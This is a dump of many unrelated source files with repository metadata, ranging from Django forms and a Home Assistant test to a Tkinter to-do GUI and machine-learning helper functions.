        gl.glBegin(gl.GL_TRIANGLES)
        gl.glColor3f(1, 0, 0)
        gl.glVertex3f(-0.6, -0.4, 0)
        gl.glColor3f(0, 1, 0)
        gl.glVertex3f(0.6, -0.4, 0)
        gl.glColor3f(0, 0, 1)
        gl.glVertex3f(0, 0.6, 0)
        gl.glEnd()

        # Swap front and back buffers
        glfw.swap_buffers(window)

        # Poll for and process events
        glfw.poll_events()

    glfw.terminate()

if __name__ == "__main__":
    main()
|
[
"cheeriocheng@gmail.com"
] |
cheeriocheng@gmail.com
|
4a1dff1fff68c27fb3452129c56f54a62957e1cf
|
716c453110217e4b478823940b6ce773fe837b3b
|
/BlogProject/school_project/users/forms.py
|
a8b4b32dc1500efcd07e0eadc0894aef874ace31
|
[] |
no_license
|
Mateaus/blog_site
|
e9a46ac581a65c2b563ff18090480f775a5ad9cf
|
305bafbd18c2a260589da77d8e162fb36994357b
|
refs/heads/master
| 2020-05-07T11:59:47.008936
| 2019-04-11T17:42:58
| 2019-04-11T17:42:58
| 180,485,036
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 652
|
py
|
from django import forms
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
from .models import Profile
# changing form to include email field
# changing form to include email field
class UserRegisterForm(UserCreationForm):
    """Registration form: Django's UserCreationForm plus a required email field."""
    email = forms.EmailField()

    class Meta:
        model = User
        fields = ['username', 'email', 'password1', 'password2']
class UserUpdateForm(forms.ModelForm):
    """Form to edit the built-in User's username and email."""
    email = forms.EmailField()

    class Meta:
        model = User
        fields = ['username', 'email']
class ProfileUpdateForm(forms.ModelForm):
    """Form to update the Profile's image field only."""
    class Meta:
        model = Profile
        fields = ['image']
|
[
"noreply@github.com"
] |
noreply@github.com
|
4b18b019b2ff1da71c7219f94ea175182cf795a4
|
bd14632342076a8099dbbd51c1b0c71bc8352b6a
|
/main.py
|
85a29f77583d8b29671e15d3c458dd515102c514
|
[
"MIT"
] |
permissive
|
nlehuen/led_display
|
511fbb3f2d0260d4ae60f3a2e6a99d366d927281
|
6f77ac919f9f3d3972646a6f26907fefb79a3be2
|
refs/heads/master
| 2021-01-22T02:48:00.386193
| 2013-09-19T08:02:41
| 2013-09-19T08:02:41
| 5,821,282
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,604
|
py
|
# -*- coding: utf-8 -*-
import time
import traceback
import json
from configuration import Configuration
import animator
import animations
import importlib
# Try to load Twitter animations
# Try to load Twitter animations; the tweet module is optional and needs the
# third-party "twitter" package, so a missing import is tolerated.
try:
    import animations.tweet
except ImportError:
    print "Please install twitter module from http://pypi.python.org/pypi/twitter/"
    animations.tweet = None

if __name__ == '__main__':
    # Load configuration
    configuration = Configuration.load('configuration.json')

    # Try to connect to LED display through serial port
    display = None
    try:
        import leddisplay
        display = leddisplay.Display(
            port = configuration.leddisplay.port.required().encode(),
            speed = configuration.leddisplay.speed.required(),
            threaded = True
        )
    except leddisplay.serial.SerialException, e:
        print "Could not connect to serial port, launching display emulator"
        print "\t%s"%e
    except:
        traceback.print_exc()

    # If connection to LED display was not successfull,
    # launch the emulator
    if display is None:
        import tkdisplay
        display = tkdisplay.Display(
            (
                configuration.tkdisplay.width.value(32),
                configuration.tkdisplay.height.value(16)
            ),
            configuration.tkdisplay.scale.value(4)
        )

    # Create the animator
    animator = animator.Animator(
        display,
        configuration.animator
    )

    # For the moment, run the animator in the main thread;
    # always close the display even if the loop raises.
    try:
        animator.mainloop()
    finally:
        display.close()
|
[
"nlehuen@google.com"
] |
nlehuen@google.com
|
df7f090efeff95de6885e079eb45d56b1f1a4a2d
|
1a8d1f8c16fb2842a0b0f71b7860f0bff8e6d257
|
/car_report/__manifest__.py
|
02c686e7de5aa9cc9cb002abd93c5923d5e67add
|
[] |
no_license
|
vidtsin/odoo-leasing
|
85a288e4d47697591397b892cb65d911987aa991
|
5fd7a2fe23ae47d992bc03a9e474c08363c78b9e
|
refs/heads/master
| 2020-08-03T04:37:39.587593
| 2019-07-28T14:25:14
| 2019-07-28T14:25:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 738
|
py
|
# -*- coding: utf-8 -*-
{
'name': 'Car Report',
'version': '0.1',
'summary': 'Show car reports',
'sequence': 30,
'description': """
car
====================
The specific and easy-to-use car system in Odoo allows you to keep track of your vehicle.
""",
'category': 'car',
'website': '',
'author': "Cedric FOWOUE",
'images': [
'static/src/img/icon.png',
],
'depends': ['car_contract', 'car_payment'],
'data': [
'security/ir.model.access.csv',
'views/car_report.xml',
],
'qweb': [
"static/src/xml/car_report.xml",
"static/src/xml/car_report_follow.xml",
],
'installable': True,
'application': False,
'auto_install': False,
}
|
[
"cedvict@gmail.com"
] |
cedvict@gmail.com
|
f2364a1f5e0049d916164fd82672d551cdfff20d
|
436568fbadd6f52fb5388136a67eef75d86bc6a7
|
/Python3_Mundo2_Introdução ao Mundo 2/Python3_Mundo2_Aula15_Interrompendo repetições while/Desafio068.py
|
f36c743d48b38c87c1b3a887d28b18324ddafa96
|
[
"MIT"
] |
permissive
|
AgladeJesus/python
|
3c72cddaf4e3c92464b5cee7975bd56a764b5f5c
|
16e4e5cc43aa987858a4719748708d6d5327d75d
|
refs/heads/master
| 2023-08-31T08:34:17.069874
| 2021-09-08T08:45:05
| 2021-09-08T08:45:05
| 377,415,579
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 944
|
py
|
from random import randint

# Odd/even ("Par ou Ímpar") game: each round the player and the computer pick a
# number, the player bets whether the sum is even (P) or odd (I), and play
# continues until the player loses a round.
print('Olá, caro jogador, sou o computador, e quero dispultar com você no Impar/Par.')
v = 0  # consecutive wins so far
while True:
    jogador = int(input('Digita um número de 1 a 10: '))
    cp = randint(0, 10)
    total = jogador + cp
    tipo = ' '
    # Keep prompting until the answer starts with P (even) or I (odd).
    while tipo not in 'PI':
        tipo = str(input('Par ou ìmpar: [P/I]: ')).strip().upper()[0]
    print(f'Você jogou {jogador} e o computador {cp}, o total é {total}', end=' ')
    print('DEU PAR' if total % 2 == 0 else 'DEU ÍMPAR')
    if tipo == 'P':
        if total % 2 == 0:
            print('Você VENCEU!!')
            v += 1
        else:
            print('Você PERDEU!!')
            break
    elif tipo == 'I':
        if total % 2 == 1:
            print('Você VENCEU!!')
            v += 1
        else:
            print('Você PERDEU!!')
            break
    if v > 0:
        print(f'Você tem {v} votórias')
    else:
        print(' ')
    print('Vamos jogar novamente...')
|
[
"agladejesus@gmail.com"
] |
agladejesus@gmail.com
|
bff704cfdcc8f2836f96e353d4860b781fb0d8a3
|
3793afb30d9e4ec39a75b2e5618cd6a2eaed0737
|
/portal system/synapse/synapse/rest/key/v1/server_key_resource.py
|
6df46969c4548ae5037bf6630d13f802cdf3c600
|
[
"Apache-2.0"
] |
permissive
|
rubyspiderman/chatsystem_reactjs
|
16a49a2026b70d0556105b02248362bbbfbfc1f9
|
a20edf38b83fe8c2ee36c2a7f3e1f7263dd134e1
|
refs/heads/master
| 2021-01-01T05:18:08.870728
| 2016-05-13T08:33:59
| 2016-05-13T08:33:59
| 58,717,217
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,996
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2014, 2015 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from twisted.web.resource import Resource
from synapse.http.server import respond_with_json_bytes
from signedjson.sign import sign_json
from unpaddedbase64 import encode_base64
from canonicaljson import encode_canonical_json
from OpenSSL import crypto
import logging
logger = logging.getLogger(__name__)
class LocalKey(Resource):
    """HTTP resource containing encoding the TLS X.509 certificate and NACL
    signature verification keys for this server::

        GET /key HTTP/1.1

        HTTP/1.1 200 OK
        Content-Type: application/json
        {
            "server_name": "this.server.example.com"
            "verify_keys": {
                "algorithm:version": # base64 encoded NACL verification key.
            },
            "tls_certificate": # base64 ASN.1 DER encoded X.509 tls cert.
            "signatures": {
                "this.server.example.com": {
                    "algorithm:version": # NACL signature for this server.
                }
            }
        }
    """

    def __init__(self, hs):
        self.hs = hs
        self.version_string = hs.version_string
        # The response depends only on the server config, so build and
        # canonical-JSON-encode it once at construction time.
        self.response_body = encode_canonical_json(
            self.response_json_object(hs.config)
        )
        Resource.__init__(self)

    @staticmethod
    def response_json_object(server_config):
        """Build the key/certificate JSON object, signed by every signing key."""
        verify_keys = {}
        for key in server_config.signing_key:
            verify_key_bytes = key.verify_key.encode()
            key_id = "%s:%s" % (key.alg, key.version)
            verify_keys[key_id] = encode_base64(verify_key_bytes)

        # DER-encode the TLS certificate so it can be base64'd into the JSON.
        x509_certificate_bytes = crypto.dump_certificate(
            crypto.FILETYPE_ASN1,
            server_config.tls_certificate
        )
        json_object = {
            u"server_name": server_config.server_name,
            u"verify_keys": verify_keys,
            u"tls_certificate": encode_base64(x509_certificate_bytes)
        }
        # Sign with each signing key in turn; signatures accumulate in the object.
        for key in server_config.signing_key:
            json_object = sign_json(
                json_object,
                server_config.server_name,
                key,
            )
        return json_object

    def render_GET(self, request):
        # Serve the pre-computed canonical JSON body.
        return respond_with_json_bytes(
            request, 200, self.response_body,
            version_string=self.version_string
        )

    def getChild(self, name, request):
        # Treat a trailing slash ("/key/") the same as "/key".
        if name == '':
            return self
|
[
"rubyspiderman@hotmail.com"
] |
rubyspiderman@hotmail.com
|
21b5c899a32d5a276c1913f41db7bb2bdd4114a1
|
f4b2f6f8c82ba00a79712292cae159edd6e93316
|
/python_voc_parser/__init__.py
|
e8b5a4dd78a5f1211bf1167cf90337dde6e4acf9
|
[
"MIT"
] |
permissive
|
gabrielrezzonico/python_voc_parser
|
31e5d016cce8a77e3cbd302f34f677ba1ca934c1
|
dd645402e40d3e18a33375f0fe92201013343110
|
refs/heads/master
| 2021-01-19T11:17:56.598529
| 2017-04-12T19:10:53
| 2017-04-12T19:10:53
| 87,950,887
| 7
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 163
|
py
|
"""Utilities"""
from . import helpers
from . import voc_annotations_parser
# Globally-importable utils.
from .voc_annotations_parser import VocAnnotationsParser
|
[
"gabrielrezzonico@gmail.com"
] |
gabrielrezzonico@gmail.com
|
94661a6524510a11b67815c32e25b75865809f16
|
ff8f1bb7be35166965ca624681f5a522b60de306
|
/medical/migrations/0011_hivemedicalrecords_user.py
|
d96926b9bc913bd8a627d1877f0c5b6cac1215d9
|
[] |
no_license
|
jonathanw82/thehoneycombAM
|
8f6b2e43d7c429b8dd1c4655e7212d4a5c9f7303
|
5a20efd9dcc6f81d1773c01c218a92732a815903
|
refs/heads/master
| 2023-04-10T06:33:48.462700
| 2021-04-12T11:40:56
| 2021-04-12T11:40:56
| 294,968,786
| 1
| 1
| null | 2021-02-16T14:25:58
| 2020-09-12T15:16:27
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 521
|
py
|
# Generated by Django 3.1.3 on 2021-01-21 16:51
import django.contrib.auth.models
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add a `user` column to HiveMedicalRecords (backfilled with default=1)."""

    dependencies = [
        ('medical', '0010_auto_20210112_1633'),
    ]

    operations = [
        migrations.AddField(
            model_name='hivemedicalrecords',
            name='user',
            # NOTE(review): verbose_name is set to the User *class* rather than a
            # string — looks unintentional, but applied migrations must not be edited.
            field=models.CharField(default=1, max_length=50, verbose_name=django.contrib.auth.models.User),
            preserve_default=False,
        ),
    ]
|
[
"jonwhewaycode@outlook.com"
] |
jonwhewaycode@outlook.com
|
0fdfd0a2fe0d2384fb8bf820f0da8991e1d1fce7
|
0a6f6cf66643975895b099004d45aeef6c454c0f
|
/sshc/modelPredict.py
|
8a20d7116d5d2059355091de88d95c096d89c681
|
[] |
no_license
|
hpqcp/Dryer-Project1
|
1f2a1d8bb22f1ab2af00087e9130a691e6cb052f
|
a0fbad8a45d6d03919cdc9f32d53da9879a7c36b
|
refs/heads/master
| 2020-04-29T02:17:06.052118
| 2020-02-25T06:42:27
| 2020-02-25T06:42:27
| 175,760,880
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,810
|
py
|
#
#
#
import pandas as pd
#
#
#return: 训练后模型 , 标准化对象X , 标准化对象y
def randomForest_model(_xTrain: object, _yTrain: object) -> object:
    """Fit a RandomForestRegressor on standardized training data.

    Returns (fitted model, fitted StandardScaler for X, fitted StandardScaler for y);
    the scalers are needed later to transform test inputs / invert predictions.
    """
    from sklearn.preprocessing import StandardScaler
    from sklearn.ensemble import RandomForestRegressor
    # Standardize the training data (commented lines show the matching
    # transform for a test split).
    ss_x = StandardScaler()
    x_train = ss_x.fit_transform(_xTrain)
    # x_test = ss_x.transform(_xTest)
    ss_y = StandardScaler()
    y_train = ss_y.fit_transform(_yTrain.reshape(-1, 1))
    # y_test = ss_y.transform(_yTest.reshape(-1, 1))
    # Build and fit the model (n_jobs=-1 uses all CPU cores).
    rf_model = RandomForestRegressor(n_jobs=-1)
    rf_model.fit(x_train, y_train)
    return rf_model,ss_x,ss_y
#
#
#
def randomForest_predict_score(_model: object, _ssx: object, _ssy: object, _xTest: object, _yTest: object, _isPlot: object = False) -> object:
    """Score a fitted model on (unscaled) test data.

    Returns ({'R2', 'MSE', 'MAE'} metrics dict, DataFrame with columns
    [ground truth, prediction]). Optionally pair-plots the two columns.
    """
    from sklearn.model_selection import train_test_split
    from sklearn.preprocessing import StandardScaler
    from sklearn.ensemble import RandomForestRegressor
    from sklearn.metrics import r2_score, mean_squared_error, mean_absolute_error
    import chart.plot as plt
    # rfr,ss_x,ss_y = randomForest_model(_xTrain,_yTrain)
    xTest1 = _ssx.transform(_xTest)
    y_predict = _model.predict(xTest1)
    df_p = pd.DataFrame(_ssy.inverse_transform(y_predict))  # invert standardization back to the original scale
    # df_t = pd.DataFrame(_ssy.inverse_transform(_yTest))  # (the ground truth is already unscaled)
    df_t = pd.DataFrame(_yTest)
    df = pd.concat([df_t, df_p], axis=1,ignore_index=True)
    if _isPlot:
        plt.pairPlot(df)
    r2 = r2_score(df.values[:, 0], df.values[:, 1])
    mse = mean_squared_error(df.values[:, 0], df.values[:, 1])
    mae = mean_absolute_error(df.values[:, 0], df.values[:, 1])
    return {'R2':r2,'MSE':mse,'MAE':mae},df
#
def model_load(_path=None):
    """Load a model previously saved with joblib from *_path*.

    Raises Exception if *_path* is None or loading fails (original Chinese
    messages preserved). Validation happens before the sklearn import so a
    bad call fails fast without pulling in sklearn.
    """
    if _path is None:  # `is None`, not `== None` (PEP 8; avoids odd __eq__ overloads)
        raise Exception('模型加载路径为空!')
    # NOTE(review): sklearn.externals.joblib is deprecated — prefer `import joblib`.
    from sklearn.externals import joblib
    try:
        model = joblib.load(_path)
    except Exception as exc:
        # Chain the original cause instead of swallowing it with a bare except.
        raise Exception('模型加载错误!') from exc
    return model
#
#
def model_save(_model=None,_path=None):
    """Persist *_model* to *_path* with joblib.

    Raises Exception if either argument is None or dumping fails (original
    Chinese messages preserved). Uses `is None` — `_model == None` could
    trigger elementwise comparison on array-like models/wrappers.
    """
    if _model is None or _path is None:
        raise Exception('模型或保存路径为空!')
    # NOTE(review): sklearn.externals.joblib is deprecated — prefer `import joblib`.
    from sklearn.externals import joblib
    try:
        joblib.dump(_model,_path)
    except Exception as exc:
        raise Exception('模型保存错误!') from exc
    return
#parm : 1.
#return : 1.得分数组 2.评价得分
def cross_score(_x,_y,_n):
    """Cross-validate a RandomForestRegressor with _n shuffled K-folds.

    Returns (per-fold score array, mean score).
    """
    from sklearn import metrics
    from sklearn.preprocessing import StandardScaler
    from sklearn.ensemble import RandomForestRegressor
    from sklearn.model_selection import KFold
    from sklearn.model_selection import cross_val_score
    # Standardize features and target before fitting.
    ss_x = StandardScaler()
    x1 = ss_x.fit_transform(_x)
    ss_y = StandardScaler()
    y1 = ss_y.fit_transform(_y.reshape(-1, 1))
    # NOTE(review): this local name shadows the module-level
    # randomForest_model() function — harmless here, but confusing.
    randomForest_model = RandomForestRegressor()
    kf = KFold(n_splits=_n, shuffle=True)
    score_ndarray = cross_val_score(randomForest_model, x1, y1, cv=kf)
    return score_ndarray,score_ndarray.mean()
#
#
#
def feature_selection_sshc(_x,_y):
    """Fit a RandomForestRegressor on standardized data and return its
    feature_importances_ array (larger value = more important feature)."""
    from sklearn.ensemble import RandomForestRegressor
    from sklearn.feature_selection import SelectFromModel
    from sklearn.preprocessing import StandardScaler
    # Standardize features and target before fitting.
    ss_x = StandardScaler()
    x1 = ss_x.fit_transform(_x)
    ss_y = StandardScaler()
    y1 = ss_y.fit_transform(_y.reshape(-1, 1))
    clf = RandomForestRegressor()
    clf = clf.fit(x1, y1)
    return clf.feature_importances_  # importance score per feature; larger means more important
#
#
#
#
def searchCV(_x,_y,_testSize=0.25):
    """Placeholder for a train/test-split evaluation.

    The body is currently commented out, so calling this only performs the
    imports and returns None.
    """
    from sklearn.model_selection import train_test_split
    from sklearn.preprocessing import StandardScaler
    from sklearn.ensemble import RandomForestRegressor
    from sklearn.metrics import r2_score,mean_squared_error,mean_absolute_error
    import chart.plot as plt
    # Randomly sample _testSize (default 25%) for test, the rest for training.
    # x_train, x_test, y_train, y_test = train_test_split(df_x, df_y, test_size=_testSize, random_state=33)
    # randomForest_predict(x_train,y_train,x_test,y_test)
# randomForest_predict(x_train,y_train,x_test,y_test)
#
#
#
if __name__ == "__main__":
__spec__ = None
import utils.excel2redis as rds
import sshc.timeAlignment as timeAlign
import numpy as np
df = rds.getBatchData('4000-2019-10-08*', 1)
df1 = pd.DataFrame(df.values[:, [3, 1, 6, 10, 11, 12, 13, 14, 17]])
df2 = pd.DataFrame(df1,dtype=np.float)
pointDiffList = [0,80,34,17,52,14,3,21,52]
df3=timeAlign.time_align_transform(df2,pointDiffList)
df_y = df3.values[:,0]
df_x = df3.values[:,1:]
#
# model , StandardScaler_x,StandardScaler_y = randomForest_model(df_x,df_y)
# model_save(model,'c://model1.m')
# model_save(StandardScaler_x, 'c://ssx1.m')
# model_save(StandardScaler_y, 'c://ssy1.m')
from sklearn.externals import joblib
model = joblib.load('c://model1.m')
ssx = joblib.load('c://ssx1.m')
ssy = joblib.load('c://ssy1.m')
scores = randomForest_predict_score(model,ssx,ssy, df_x, df_y, _isPlot=True)
# fi = model.feature_importances_
# feature_selection_sshc(df_x,df_y)
#scores,mean_score = cross_score(df_x,df_y,10)
#searchCV(df_x,df_y,_testSize=0.2)
# import chart.plot as plt
# plt.pairPlot(DataFrame(df_y))
# df_train_x = df3.values[200:1500,1:]
# df_train_y = df3.values[200:1500, 0]
# df_test_x = df3.values[200:399,1:]
# df_test_y = df3.values[200:399, 0]
# randomForest_predict(df_train_x,df_train_y,df_test_x,df_test_y)
# time_align_fit(df1,[0,10,20,30,40,50,60,70,80,90,100])
print
|
[
"14499382@qq.com"
] |
14499382@qq.com
|
dcfd08920d5d8dc25f09f1674d7a69c10ecedbb1
|
1bed2f766620acf085ed2d7fd3e354a3482b8960
|
/tests/components/sensibo/test_entity.py
|
818d9ddb92499f60c743ebd9a3a8e50177e03817
|
[
"Apache-2.0"
] |
permissive
|
elupus/home-assistant
|
5cbb79a2f25a2938a69f3988534486c269b77643
|
564150169bfc69efdfeda25a99d803441f3a4b10
|
refs/heads/dev
| 2023-08-28T16:36:04.304864
| 2022-09-16T06:35:12
| 2022-09-16T06:35:12
| 114,460,522
| 2
| 2
|
Apache-2.0
| 2023-02-22T06:14:54
| 2017-12-16T12:50:55
|
Python
|
UTF-8
|
Python
| false
| false
| 2,826
|
py
|
"""The test for the sensibo entity."""
from __future__ import annotations
from unittest.mock import patch
from pysensibo.model import SensiboData
import pytest
from homeassistant.components.climate.const import (
ATTR_FAN_MODE,
DOMAIN as CLIMATE_DOMAIN,
SERVICE_SET_FAN_MODE,
)
from homeassistant.components.sensibo.const import SENSIBO_ERRORS
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import ATTR_ENTITY_ID
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers import device_registry as dr, entity_registry as er
async def test_entity(
    hass: HomeAssistant, load_int: ConfigEntry, get_data: SensiboData
) -> None:
    """Test the Sensibo climate entity and its device/entity registry entries."""
    # The fixture-loaded integration should have created the climate entity.
    state1 = hass.states.get("climate.hallway")
    assert state1
    dr_reg = dr.async_get(hass)
    dr_entries = dr.async_entries_for_config_entry(dr_reg, load_int.entry_id)
    dr_entry: dr.DeviceEntry
    for dr_entry in dr_entries:
        if dr_entry.name == "Hallway":
            # Device is keyed by the Sensibo device id from the fixture data.
            assert dr_entry.identifiers == {("sensibo", "ABC999111")}
            device_id = dr_entry.id
    er_reg = er.async_get(hass)
    # NOTE(review): device_id is unbound if no "Hallway" device exists —
    # this relies on the fixture always providing one.
    er_entries = er.async_entries_for_device(
        er_reg, device_id, include_disabled_entities=True
    )
    er_entry: er.RegistryEntry
    for er_entry in er_entries:
        if er_entry.name == "Hallway":
            assert er_entry.unique_id == "Hallway"
@pytest.mark.parametrize("p_error", SENSIBO_ERRORS)
async def test_entity_failed_service_calls(
    hass: HomeAssistant,
    p_error: Exception,
    load_int: ConfigEntry,
    get_data: SensiboData,
) -> None:
    """Test the Sensibo send command with error."""
    state = hass.states.get("climate.hallway")
    assert state
    # Happy path: with the client patched to succeed, the service call
    # goes through and the fan mode updates.
    with patch(
        "homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
        return_value={"result": {"status": "Success"}},
    ):
        await hass.services.async_call(
            CLIMATE_DOMAIN,
            SERVICE_SET_FAN_MODE,
            {ATTR_ENTITY_ID: state.entity_id, ATTR_FAN_MODE: "low"},
            blocking=True,
        )
    await hass.async_block_till_done()
    state = hass.states.get("climate.hallway")
    assert state.attributes["fan_mode"] == "low"
    # Error path: each parametrized client error must surface as
    # HomeAssistantError and leave the entity state unchanged.
    with patch(
        "homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
        side_effect=p_error,
    ):
        with pytest.raises(HomeAssistantError):
            await hass.services.async_call(
                CLIMATE_DOMAIN,
                SERVICE_SET_FAN_MODE,
                {ATTR_ENTITY_ID: state.entity_id, ATTR_FAN_MODE: "low"},
                blocking=True,
            )
    state = hass.states.get("climate.hallway")
    assert state.attributes["fan_mode"] == "low"
|
[
"noreply@github.com"
] |
noreply@github.com
|
3459276818ce07479d8a250a648e51b33e116764
|
c9ca065c2674ca30c12a90ceab88ac5798646473
|
/weather/weather.py
|
0911597edd9300a64cc9034898c72555e919512b
|
[] |
no_license
|
mshazman/data_munging
|
beaa389ad3de48d52f1f2ef03ed4ba7f04c77698
|
f4f815a896f8f7a6957ebbb22369dd760e95072e
|
refs/heads/master
| 2020-07-23T17:03:01.970331
| 2019-09-10T19:07:20
| 2019-09-10T19:07:20
| 207,640,211
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 590
|
py
|
"""This Module have class to perform all calculation realted to weather"""
import calculation
class WeatherCalculation(calculation.Computation):
    """Apply Computation helpers to a dictionary of weather data."""

    def __init__(self, weather_data):
        # weather_data: mapping whose values are compared by the inherited
        # compute_min_value* helpers — presumably day -> temperature spread;
        # TODO confirm against the Computation base class.
        self.weather_data = weather_data

    def min_spread_day(self):
        """Return (minimum spread value, day key of that minimum)."""
        min_value = self.compute_min_value(self.weather_data)
        min_value_key = self.compute_min_value_key(min_value, self.weather_data)
        return min_value, min_value_key
|
[
"="
] |
=
|
5311ad2fb6847110b4a1606ef629ada8e3ae8b27
|
688ae097a1f413f82c4a4f2840153e261a8504d4
|
/main.spec
|
c69f5a6d2fd675096c0caa96c2e7cf7cb3a26355
|
[
"MIT"
] |
permissive
|
Danverr/DeliveryCalc
|
f1225401db3e47733199044800f6752c06933550
|
c4384fc2a991817e09707288006937bd45183d71
|
refs/heads/master
| 2020-09-16T01:53:49.359474
| 2019-11-23T16:12:38
| 2019-11-23T16:12:38
| 223,615,248
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,240
|
spec
|
# -*- mode: python -*-
# PyInstaller spec: names like Analysis/PYZ/EXE/COLLECT are injected into
# this file's namespace when PyInstaller executes it.
block_cipher = None

a = Analysis(['DeliveryCalc.py'],
             pathex=['.'],
             binaries=[],
             hiddenimports=['Code/*.pyd'],
             hookspath=[],
             runtime_hooks=[],
             excludes=[],
             win_no_prefer_redirects=False,
             win_private_assemblies=False,
             cipher=block_cipher)
pyz = PYZ(a.pure, a.zipped_data,
          cipher=block_cipher)

# Binary-name substrings to strip from the bundle (shrinks the build).
Key = ['mkl','libopenblas']
def remove_from_list(input, keys):
    """Return *input* without the TOC entries whose name contains any of *keys*.

    input: PyInstaller TOC list of (name, path, typecode) tuples.
    keys:  substrings; a case-sensitive match anywhere in the name excludes it.
    """
    # NOTE: parameter name `input` shadows the builtin but is kept so the
    # spec's call sites stay valid.
    return [
        item
        for item in input
        if not any(key_word in item[0] for key_word in keys)
    ]
# Filter the heavyweight BLAS/MKL binaries out of the bundle before packing.
a.binaries = remove_from_list(a.binaries, Key)

exe = EXE(pyz,
          a.scripts,
          exclude_binaries=True,
          name='DeliveryCalc',
          debug=False,
          strip=False,
          upx=True,
          console=True )
coll = COLLECT(exe,
               a.binaries,
               a.zipfiles,
               a.datas,
               strip=False,
               upx=True,
               name='DeliveryCalc')
|
[
"noreply@github.com"
] |
noreply@github.com
|
eab2e26261a3cbc0a255243129e8e1698d3489e8
|
7f6e573bfe32c1085311a13c79f7c1e2d7a83f79
|
/00977 - Squares of a Sorted Array/solutions.py
|
dcc18552d2afcdc3ec33bd0f108a38b8b4318d50
|
[] |
no_license
|
ngoyal16/LeetCode
|
0b7366c566996422ca7b89c3b0540e494aab4e9f
|
747b902224bd3ded576a67c926cc1fbb458a97d3
|
refs/heads/master
| 2022-12-10T08:34:19.590452
| 2022-12-07T08:28:05
| 2022-12-07T08:28:05
| 175,677,750
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 198
|
py
|
class Solution(object):
    def sortedSquares(self, A):
        """
        :type A: List[int]
        :rtype: List[int]
        """
        # Sorting by absolute value makes the squares come out in order.
        # Use a list comprehension instead of map(): on Python 3, map()
        # returns a lazy iterator, not the List[int] the contract promises.
        return [x * x for x in sorted(A, key=abs)]
|
[
"noreply@github.com"
] |
noreply@github.com
|
ff4ba646859730beeecd4cb569fbc5a89f48be03
|
ce7bb5ba72569d1503a54551ce99bb45addd9d15
|
/components/main window (1).py
|
c3e235727794891b14f8b40a59c1877b74f24f77
|
[] |
no_license
|
vic025/todo
|
4fe620ace4704cacfba270494782a166bfd2aa5a
|
56872e1de1ae12fd2c8c10ac3055737372ae3445
|
refs/heads/master
| 2023-07-01T17:58:23.010349
| 2021-08-06T23:06:37
| 2021-08-06T23:06:37
| 363,345,349
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,021
|
py
|
# GUI of main window without functionality
import tkinter as tk
from tkinter.font import Font
from tkinter import *
from tkmacosx import Button, CircleButton
from PIL import Image, ImageTk
# Fixed-size 370x500 window positioned at (600, 75).
root = tk.Tk()
root.title('To-do List')
root.geometry('370x500+600+75')
root.resizable(False, False)

# Title (1)
# Font size and weight for the title
title_label_font = Font(
    family="SF Pro Rounded",
    size=20,
    weight="bold"
)

# Title name
title_label = tk.Label(root, text="To-do List",
                       font=title_label_font)
title_label.place(x=30, y=25)

# Inputs (1)
# Task name entry
new_task_entry = Entry(root, width=11)
new_task_entry.place(x=35, y=75)

# Time entry
new_task_entry_1 = Entry(root, width=5)
new_task_entry_1.place(x=156, y=75)

# Date entry
new_task_entry_2 = Entry(root, width=7)
new_task_entry_2.place(x=223, y=75)

# List (1)
list_tasks = tk.Listbox(width=29, height=16)
list_tasks.place(x=35, y=125)

# Buttons (1)
# Add task button
# NOTE(review): image paths are absolute to one machine — consider paths
# relative to the script before shipping.
add_image = ImageTk.PhotoImage(
    Image.open("/Users/vic/PycharmProjects/todo/images/add.png"))
add_task_button = CircleButton(root, image=add_image, bg='#ffffff',
                               fg='#000000', borderless=1, width=35)
add_task_button.place(x=308, y=71)

# Delete selected task button (no commands wired up yet — GUI only)
delete_selected = Button(root, text="Delete", bg='#ffffff',
                         fg='#000000', borderless=1,
                         activebackground=('#C96666', '#C96666'))
delete_selected.place(x=35, y=423)

# Delete all tasks
delete_all = Button(root, text="Delete all", bg='#ffffff',
                    fg='#000000', borderless=1,
                    activebackground=('#C96666', '#C96666'))
delete_all.place(x=134, y=423)

# Settings button
settings_image = ImageTk.PhotoImage(
    Image.open("/Users/vic/PycharmProjects/todo/images/settings.png"))
settings_button = CircleButton(root, image=settings_image, bg='#ffffff',
                               fg='#000000', borderless=1, width=35)
settings_button.place(x=308, y=418)

# Blocks here running the Tk event loop.
root.mainloop()
|
[
"v1q025@gmail.com"
] |
v1q025@gmail.com
|
cb8e8814cc62f4c8391fcb723e8027d1860d330b
|
e8c16328e22b8ccda2e3d2998d2ec1689d79914b
|
/exercise_2017/5th_week/test_1.py
|
0ea44957c76a9923802c513c58e5213bc91b5f64
|
[
"MIT"
] |
permissive
|
Taewan-P/python_study
|
e2e68cc0f1467832dace22e27cc70d217560cf2c
|
f347e370aaa33aba5ab233252bcd759b94615348
|
refs/heads/master
| 2021-05-11T03:44:04.495186
| 2018-01-18T03:02:31
| 2018-01-18T03:02:31
| 117,923,881
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 548
|
py
|
